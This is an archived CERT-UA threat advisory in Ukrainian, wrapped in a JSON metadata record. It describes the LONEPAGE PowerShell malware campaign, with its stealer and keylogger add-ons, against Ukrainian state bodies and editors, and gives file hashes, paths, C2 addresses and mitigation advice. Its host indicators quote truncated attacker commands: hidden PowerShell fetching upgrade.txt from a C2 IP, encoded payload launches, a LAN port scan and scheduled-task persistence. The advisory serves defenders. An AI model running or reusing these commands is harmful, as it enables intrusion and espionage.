{
	"id": "caff062f-614b-4a1f-a3d8-994f5f4131c0",
	"created_at": "2026-04-06T00:20:19.151627Z",
	"updated_at": "2026-04-10T03:21:00.094752Z",
	"deleted_at": null,
	"sha1_hash": "937d276b0a50d6bcf544bd5544b7089b3b863c98",
	"title": "CERT-UA",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 10417575,
	"plain_text": "CERT-UA\r\nArchived: 2026-04-02 12:06:13 UTC\r\nЗагальна інформація\r\nУрядовою командою реагування на комп'ютерні надзвичайні події України CERT-UA, починаючи з другої\r\nполовини 2022 року відстежується активність, що здійснюється у відношенні державних організацій та\r\nпредставників засобів масової інформації (редакторів) України з метою шпигунства. \r\nНевстановленими особами за допомогою електронної пошти та мессенджерів розповсюджуються файли\r\n(.HTA, .EXE, .RAR, .LNK), запуск яких призводить до ураження ЕОМ жертви шкідливою програмою\r\nLONEPAGE. Згадана програма являє собою PowerShell-сценарій (зазвичай, у вигляді JavaScript або\r\nVBScript файлу), що здійснює завантаження з серверу управління TXT-файлу (\"upgrade.txt\"), виконання\r\nPowerShell-команд, які містяться у файлі, та передачу результатів на сервер за допомогою HTTP POST\r\nзапиту.\r\nПри цьому, на уражену ЕОМ можуть завантажуватися шкідливі програми \"THUMBCHOP\" (стілер для\r\nChrome та Opera), \"CLOGFLAG\" (кейлогер), а також TOR та SSH для створення прихованого сервісу і/або\r\nпобудови зворотнього з'єднання і, в такий спосіб, створення передумов для інтерактивного\r\nнесанкціонованого віддаленого доступу до комп'ютера. Під час реагування на інцидент також було\r\nвиявлено зразки шкідливих програм, розроблених з використанням мови програмування Go, а саме:\r\nSEAGLOW та OVERJAM\r\nКрім того, відомі випадки горизонтального переміщення з ураженої ЕОМ, а саме, сканування локальної\r\nобчислювальної мережі, компрометації комп'ютерів привілейованих користувачів та отримання доступу до\r\nкорпоративних інформаційних систем.\r\nПротягом 2022 - 2023 років згаданим угрупуванням отримано несанкціонований віддалений доступ до\r\nдекількох десятків ЕОМ в Україні.\r\nМінімізації реалізації описаної загрози може сприяти, серед іншого, обмеження можливості запуску на\r\nЕОМ легітимних компонентів: wscript.exe, cscript.exe, powershell.exe, mshta.exe.\r\nІндикатори кіберзагроз\r\nФайли:\r\nf969edd0027b535b085f4642072e241b  8f2a5eeac887a4a9acb30b25c9d2bf4405c6d0c0207ebd7886e95988c93a8a5a\r\n7581ec90e1995586f0f86f62eb61b305  a7317dfa2e5fd9bc944a84cd7fd72d943377b567cd186eeea2af5066b28ff0a9\r\n9ba6ecad25a0b5666454aa8276235a83  bcfb1cf90d507fbbc52217d35d84d3dd3c55bcc3cf825ef35e4b829525544b7c\r\naf73d4d0361b66dc54f3c25db6351111  55d8b1951e1ce8b3aea07ee3a3fb9f0e8f0cd345d08096806ddad9a6691510ec\r\n286e04a218a6df2b4426f2b986971b36  7255941febd9e2b398e14b4b8b1cbbd7b68908f5c73ecbfafc4c48d68e0e1d6a\r\nabb9140e98eaf1b2729ace09d77169b6  584d03057a739240eede6384dc3a1537dc1fc896cc9c506ab1a281c195393ae2\r\nhttps://cert.gov.ua/article/4818341\r\nPage 1 of 6\n\nb6f0d098d757fcc81f77534aebd3cf1b\r\ne04ba69e4d4935b30c3325679328b1f12cbf1eb2c5b739d717487d20bd667d12\r\n2077689e5b9eb862add8ef779738c4693a1437355c222bf4262dfcf76718cf35789fdab7ef424ade0651046435b5ddc5\r\nb1041363732d49fcabc39beeda27717c  75a2b04082b3d0178b98da2ae14265d0169419a76c7c79cc0abd3c451904c61a\r\n196d162f19ef28ae5afca4baafa38cfb  4453bf8cd981b35f8defe5c8392d6b23cea730877c047d99e11535b20da0caca\r\n46410bb9e3ed9bf5c228d6da4089866c  3cf76b9dd4ed21168a3c2aaab158a65df4558d4557d47383ecd3a55df64e5c3b\r\n663bc28526d059a14a23a6a5945a8f58  083a8a7ceceab777e47a49595e583c7137173b23318914399ad9dbab15a4c29a\r\n96120f299054be502d01ccdb7c5083a3  36555640516b1ed087638443cbab08a368192995b06284396143e5d83d7cf96c\r\nb454fe65b817f88042f00de97528530b  f0bdcb507aaf9af91bc69511a4873462e9b2b07c173c71d9c4c622a2754f5d5b\r\na848e813ffc0040c9392c213eb8f6102  786f4b1a64160077d771702b5da2e559425591b2f9a3fcf9d6de76858151c773\r\n3330e620101b6ecbfa7c121b9ed2590e  907bccf7ce8e744680364e3e137365ce4d8ebe9d19c2c3e2342794747c5dd292\r\nb96418ef58218d762836fcb17d14ea4d  b9b5f81d36e8e514ffccf9b85c0c61e76322a279a7f5a67821b5396b9beaff3a\r\n179baa523f8ad63b492bacc8acabaf04  fb1312e70cd1766928550985782eb7b89d78cc93cfc66bafaa12287db2f8cf56\r\ned0a9320189bdeb340c9afbf02e0e2d3  03e10e3dd7d8ba535c54cd4e38bc9815938df0460120fa1d6d7614d05a1e824f\r\n11bc275d9dc476829c1a36ee89506db5  77c1e74a2b0bca42bf30ed539663e6b5db2aa18dcdea55fd92eb6273ef1362a5\r\na255c0f591c9a4ddddfb700d8937288d  ec87ed83f6b1b5cbd40355a5e5b12a0fa9232f1264243998c0f4ae9f1ab03faa\r\nb8014ca4b86015ceb6024d39c72f33ea  51cd4682f6152f0a9f915c6bb75991cbf0140da8e39f903a931f39a1b19fd542\r\na74244d531c0a11259b5b4cd9bcc7a7e  00b7e464b190dc3ee8847e214857b83180f948b5c887466f09bb91a3352b889a\r\ne70218a98dc74d5d7cda2f6a756e1f25  0c0b3025dcd6d5bb96c83305cfa26795b4ec956ba62661f8e67b477542268229\r\nd565d3d36651d3be3cd3e8df9e0bd6c2  89b0868fccc4e64a710c0a85a84e23f4788b7474c8ce847a1fef9f1616dd69fa\r\nХостові:\r\n%APPDATA%\\Microsoft\\Installer\\taskhost.exe\r\n%APPDATA%\\Microsoft\\Windows\\start menu\\programs\\startup\\WindowsUpdateServices.lnk\r\n%LOCALAPPDATA%\\Google\\Chrome\\User Data\\NetworkService\\Local State.txt\r\n%LOCALAPPDATA%\\OneDriveFiles\\OneDriveUpdaterCore.vbs\r\n%LOCALAPPDATA%\\UpdateFiles\\temp.bin\r\n%USERPROFILE%\\.ssh\\\r\n%USERPROFILE%\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_64.db\r\n%USERPROFILE%\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_windows.js\r\n%USERPROFILE%\\AppData\\Local\\Microsoft\\Windows\\Shell\\svchost.exe\r\n%USERPROFILE%\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\ZillyaCore.exe\r\n%USERPROFILE%\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\svchost.exe\r\n%USERPROFILE%\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\WindowsUpdateServices.exe\r\n%USERPROFILE%\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\slideshow.bat\r\n%USERPROFILE%\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\slideshow.exe\r\n%USERPROFILE%\\appdata\\local\\temp\\TaskManager.exe\r\n%USERPROFILE%\\appdata\\local\\temp\\audiocompress.js\r\n%USERPROFILE%\\appdata\\local\\temp\\update.js\r\n%USERPROFILE%\\appdata\\local\\temp\\wininit.exe\r\n%USERPROFILE%\\downloads\\AlexEcoPlanet.html\r\n%USERPROFILE%\\downloads\\AngelsWebsite.html\r\n%LOCALAPPDATA%\\Microsoft\\WindowsApps\\SearchApp.exe\r\nC:\\Microsoft\\Windows\\start menu\\programs\\startup\\WindowsUpdateServices.lnk\r\nC:\\Windows\\System32\\Tasks\\OneDriveUpdateCoreFilesStart\r\n%WINDIR%\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -w hidden -nop -noni -exec bypass -c $temp=\r\nhttps://cert.gov.ua/article/4818341\r\nPage 2 of 6\n\nattrib.exe +h $home\\.ssh\r\nattrib.exe +h C:\\programdata\\ssh\r\nmkdir $home\\.ssh\r\nmkdir C:\\ProgramData\\ssh\r\nforeach ($ip 50..255){foreach($port in 21,22,23,139,443,80,445,626) {Test-NetConnection 192.168.88.$i\r\nnet.webclient;$flm=$iik.downloaddata('http://217.12.218.107:30139/aMPnGqjRPSQIOZQG/page147/upgrade.tx\r\npowershell.exe -w hidden -nop -noni -exec bypass -c kill -name mshta;$a='ZGltIHIsIGMNCnNldCByID0gY3Jl\r\npowershell.exe -w hidden -nop -noni -exec bypass -c;$a='//48ACEAR[...]BtAGwAPgA=';$b=[System.Convert\r\npowershell.exe -w hidden -nop -noni -exec bypass -c;$a='//4gADwAI[...]BtAGwAPgA=';$b=[System.Convert\r\nschtasks.exe /create /TN BatIncludeMessage /SC minute /mo 3 /tr $home\\AppData\\Local\\temp\\tm76Grt9.vbs\r\nschtasks.exe /create /TN OneDriveUpdateCoreFilesStart /SC minute /mo 15 /tr %LOCALAPPDATA%\\OneDriveFi\r\nschtasks.exe /create /TN ThemesSlide /SC minute /mo 27 /tr $home\\AppData\\Roaming\\Microsoft\\Windows\\Th\r\nschtasks.exe /create /tn OneDriveStandal0ne /tr C:\\Users\\Public\\Libraries\\OneDriveUpdate.js /sc minut\r\nstart-process \"C:\\Users\\user\\appdata\\Local\\Microsoft\\WindowsApps\\SearchApp.exe\" -ArgumentList \"-s 62\r\nBatIncludeMessage (Scheduled Task)\r\nOneDriveUpdateCoreFilesStart (Scheduled Task)\r\nThemesSlide (Scheduled Task)\r\nOneDriveStandal0ne (Scheduled Task)\r\nC:\\Users\\user\\Desktop\\KeyLog_with_date\\KL\\KL\\obj\\Release\\WindowsUpdateServices.pdb (PDB)\r\nC:\\Users\\user\\Desktop\\svchost\\svchost\\obj\\Release\\svchost.pdb (PDB)\r\nC:\\Users\\user\\Documents\\Visual Studio 2012\\Projects\\OneDriveUpdateCore\\OneDriveUpdateCore\\obj\\Release\r\nC:\\Users\\user\\Documents\\Visual Studio 2012\\Projects\\WindowsNotificationsServ\\WindowsNotificationsServ\r\nМережеві:\r\n156[.]38.245.115\r\n179[.]48.251.182\r\n217[.]12.218.107\r\n45[.]148.121.6\r\n62[.]210.204.94\r\nhXXp://156[.]38.245.115/oHYgdtRwKJ/page69/upgrade[.]txt\r\nhXXp://156[.]38.245.115:38104/page69\r\nhXXp://217[.]12.218.107:25928/page121\r\nhXXp://217[.]12.218.107:25928/page147\r\nhXXp://217[.]12.218.107:30139/aMPnGqjRPSQIOZQG/page147/upgrade[.]txt\r\nhXXp://45[.]148.121.6:32341/slideshow[.]bat\r\nhXXp://45[.]148.121.6:32341/slideshow[.]php\r\nГрафічні зображення\r\nhttps://cert.gov.ua/article/4818341\r\nPage 3 of 6\n\nРис.1 Ланцюг ураження LonePage (HTA)\r\nРис.2 Ланцюг ураження LonePage (LNK)\r\nhttps://cert.gov.ua/article/4818341\r\nPage 4 of 6\n\nРис.3 Ланцюг ураження LonePage (EXE)\r\nРис.4 Приклад вихідного коду шкідливих програм ThumbChop та ClopFlag\r\nhttps://cert.gov.ua/article/4818341\r\nPage 5 of 6\n\nРис.5 Приклад вихідного коду шкідливої програми OverJam\r\nSource: https://cert.gov.ua/article/4818341\r\nhttps://cert.gov.ua/article/4818341\r\nPage 6 of 6",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia",
		"MISPGALAXY"
	],
	"references": [
		"https://cert.gov.ua/article/4818341"
	],
	"report_names": [
		"4818341"
	],
	"threat_actors": [],
	"ts_created_at": 1775434819,
	"ts_updated_at": 1775791260,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/937d276b0a50d6bcf544bd5544b7089b3b863c98.pdf",
		"text": "https://archive.orkl.eu/937d276b0a50d6bcf544bd5544b7089b3b863c98.txt",
		"img": "https://archive.orkl.eu/937d276b0a50d6bcf544bd5544b7089b3b863c98.jpg"
	}
}